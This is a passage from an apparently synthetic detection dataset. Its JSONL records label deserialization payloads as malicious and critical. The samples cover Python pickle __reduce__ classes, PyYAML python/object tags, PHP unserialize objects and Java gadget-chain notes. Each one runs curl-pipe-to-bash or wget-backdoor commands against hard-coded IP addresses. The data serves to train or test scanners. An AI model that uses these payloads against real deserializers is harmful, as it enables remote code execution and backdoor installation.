'/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00462", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://74.192.100.129/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://74.192.100.129/shell\")"}}]} {"id": "synth_malicious_deserialization_00463", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:27:\"ShbuvbVxpxrGila4DMPVwya3FKqubicT/Df8h+XH\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://89.2.73.98/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:27:\"ShbuvbVxpxrGila4DMPVwya3FKqubicT/Df8h+XH\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://89.2.73.98/bd\")"}}]} {"id": "synth_malicious_deserialization_00464", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('xOIKNxkgipLIZnx2zIMqcQyTn1ojv67DDdrNioFt0plo7xQddBhfMTL4bAMh')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://230.245.102.24/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('xOIKNxkgipLIZnx2zIMqcQyTn1ojv67DDdrNioFt0plo7xQddBhfMTL4bAMh')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00465", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:28:\"dipNhRnoQm8Ski/3yt1KNxLFDEHF/S+KVAw4SJs1\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://192.153.152.71/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:28:\"dipNhRnoQm8Ski/3yt1KNxLFDEHF/S+KVAw4SJs1\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://192.153.152.71/bd\")"}}]} {"id": "synth_malicious_deserialization_00466", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://162.26.24.254/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://162.26.24.254/shell\")"}}]} {"id": "synth_malicious_deserialization_00467", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://204.72.40.182/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://204.72.40.182/shell\")"}}]} {"id": "synth_malicious_deserialization_00468", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:46:\"bjDHqKB6f1VjdozfrE5XGN06ZJh0w+gUMdRmevUy\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://202.140.253.18/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:46:\"bjDHqKB6f1VjdozfrE5XGN06ZJh0w+gUMdRmevUy\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://202.140.253.18/bd\")"}}]} {"id": "synth_malicious_deserialization_00469", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('2VZrvfecHbd6lYliWizQReZSCzMV7vchZ0+z7j28GXtUeM7e0JVhMgh/2QVV')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://75.122.62.56/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('2VZrvfecHbd6lYliWizQReZSCzMV7vchZ0+z7j28GXtUeM7e0JVhMgh/2QVV')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00470", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:47:\"i96/4fPJLV7zMXYhWk3EuA54oVj5R1pHBTT5MIwg\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://101.2.56.122/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:47:\"i96/4fPJLV7zMXYhWk3EuA54oVj5R1pHBTT5MIwg\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://101.2.56.122/bd\")"}}]} {"id": "synth_malicious_deserialization_00471", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('eC19bEQ6PtX828WTbjROryN1VeB1rACVwWZPSTNx9AkOGSs+fQdsEMYDS9kg')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://31.95.17.113/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('eC19bEQ6PtX828WTbjROryN1VeB1rACVwWZPSTNx9AkOGSs+fQdsEMYDS9kg')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00472", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://181.92.239.74/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://228.118.2.91/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://181.92.239.74/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://228.118.2.91/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00473", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('usVHskGm0Cpy+tK//CuzEkiTIhp0thgEA1/CgnGUDeFAEENKVIU4Md3kwjG+')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://145.178.156.84/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('usVHskGm0Cpy+tK//CuzEkiTIhp0thgEA1/CgnGUDeFAEENKVIU4Md3kwjG+')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00474", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:69:\"gMobk8n5tvbPuuXm4a7iAGeLRSeHMEpJY0yQIEh8\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://76.198.118.77/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:69:\"gMobk8n5tvbPuuXm4a7iAGeLRSeHMEpJY0yQIEh8\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://76.198.118.77/bd\")"}}]} {"id": "synth_malicious_deserialization_00475", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://13.31.205.157/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://13.31.205.157/shell\")"}}]} {"id": "synth_malicious_deserialization_00476", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:53:\"+r24UpHolHrZKXOLH32TrmFzu/59QNyXu2uEOlnT\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://21.82.230.182/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:53:\"+r24UpHolHrZKXOLH32TrmFzu/59QNyXu2uEOlnT\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://21.82.230.182/bd\")"}}]} {"id": "synth_malicious_deserialization_00477", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:79:\"vdnwMFKpJECiXrkCMJp03ZCNAnvwDkfoEHTs1f09\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://76.30.195.176/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:79:\"vdnwMFKpJECiXrkCMJp03ZCNAnvwDkfoEHTs1f09\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://76.30.195.176/bd\")"}}]} {"id": "synth_malicious_deserialization_00478", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://200.23.185.51/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://137.233.134.178/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://200.23.185.51/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://137.233.134.178/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00479", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:40:\"q8liWsYV9lwfmZmYglRG0lqTAXmnu0w5fLIae5NH\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://251.95.114.192/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:40:\"q8liWsYV9lwfmZmYglRG0lqTAXmnu0w5fLIae5NH\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://251.95.114.192/bd\")"}}]} {"id": "synth_malicious_deserialization_00480", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://206.26.113.209/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://206.26.113.209/shell\")"}}]} {"id": "synth_malicious_deserialization_00481", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('uTUCQsEalxhQuceOw49k5P+G11mJBPb7JmtV5Gx+eska1Ec5Vfi6e3DRxRKe')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://104.10.248.158/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('uTUCQsEalxhQuceOw49k5P+G11mJBPb7JmtV5Gx+eska1Ec5Vfi6e3DRxRKe')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00482", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:51:\"tV/KD47tWDg9tZbgD3NdPjJxaATxI+L+E23ixTOA\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://91.195.118.244/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:51:\"tV/KD47tWDg9tZbgD3NdPjJxaATxI+L+E23ixTOA\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://91.195.118.244/bd\")"}}]} {"id": "synth_malicious_deserialization_00483", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://156.90.180.233/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://156.90.180.233/shell\")"}}]} {"id": "synth_malicious_deserialization_00484", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:53:\"+zmHF69Rkh+moUriTG6e+cunxbEcvAJY3gu/CgSc\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://80.230.145.247/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:53:\"+zmHF69Rkh+moUriTG6e+cunxbEcvAJY3gu/CgSc\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://80.230.145.247/bd\")"}}]} {"id": "synth_malicious_deserialization_00485", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('P8o51u0LJvEq+cGX99TW1nyxP09ZQDenw6kZA3C9XV1e6wI5+C3FhZbLvqwY')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://11.59.73.138/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('P8o51u0LJvEq+cGX99TW1nyxP09ZQDenw6kZA3C9XV1e6wI5+C3FhZbLvqwY')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00486", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://76.24.18.106/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://76.24.18.106/shell\")"}}]} {"id": "synth_malicious_deserialization_00487", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://226.158.206.183/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://226.158.206.183/shell\")"}}]} {"id": "synth_malicious_deserialization_00488", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://196.175.113.123/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections5\n// Payload: Runtime.exec(\"curl http://196.175.113.123/shell\")"}}]} {"id": "synth_malicious_deserialization_00489", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('OJUz1AkY7+8SwZrdjiMXH+6B7X2XFYGfDu9uZb24uySw4IDO0BLIaObgTkgd')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://142.159.131.111/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('OJUz1AkY7+8SwZrdjiMXH+6B7X2XFYGfDu9uZb24uySw4IDO0BLIaObgTkgd')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00490", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('MwiQKVw0zImgpYYD9ovIfKZqQ7I/AGOBvrE9P0kgKVHHytvoSvJDQzhw/7NW')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://203.75.7.94/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('MwiQKVw0zImgpYYD9ovIfKZqQ7I/AGOBvrE9P0kgKVHHytvoSvJDQzhw/7NW')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00491", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://131.47.179.78/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://121.197.196.79/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://131.47.179.78/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://121.197.196.79/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00492", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://60.154.28.233/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://60.154.28.233/shell\")"}}]} {"id": "synth_malicious_deserialization_00493", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://243.241.29.209/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://248.27.115.177/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://243.241.29.209/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://248.27.115.177/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00494", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:35:\"8n1i8TZE9Gz7pwEYqIiqauJoUeF21Nk5h2OWfL4t\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://184.166.79.102/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:35:\"8n1i8TZE9Gz7pwEYqIiqauJoUeF21Nk5h2OWfL4t\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://184.166.79.102/bd\")"}}]} {"id": "synth_malicious_deserialization_00495", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://51.238.26.98/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://182.157.17.7/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://51.238.26.98/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://182.157.17.7/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00496", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://181.195.32.26/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://158.196.214.69/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://181.195.32.26/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://158.196.214.69/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00497", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://196.211.183.105/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://165.44.152.98/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://196.211.183.105/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://165.44.152.98/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00498", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:27:\"La5cjbqCYH/8j8dQ4mMMrTvvooq9FrdBTxLjLUxA\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://18.127.133.142/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:27:\"La5cjbqCYH/8j8dQ4mMMrTvvooq9FrdBTxLjLUxA\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://18.127.133.142/bd\")"}}]} {"id": "synth_malicious_deserialization_00499", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:68:\"pF2rjS2Why2l0SKKiqgsS7BvomuUbvpm+b9aehnQ\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://191.131.243.214/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:68:\"pF2rjS2Why2l0SKKiqgsS7BvomuUbvpm+b9aehnQ\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://191.131.243.214/bd\")"}}]} {"id": "synth_malicious_deserialization_00500", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://234.161.208.29/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://3.41.24.39/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://234.161.208.29/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://3.41.24.39/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00501", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\n!!python/object/apply:os.system\nargs: ['curl http://66.176.149.174/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://88.9.156.214/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://66.176.149.174/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://88.9.156.214/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00502", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://52.79.167.130/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://8.103.172.38/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://52.79.167.130/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://8.103.172.38/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00503", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://39.169.79.43/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": 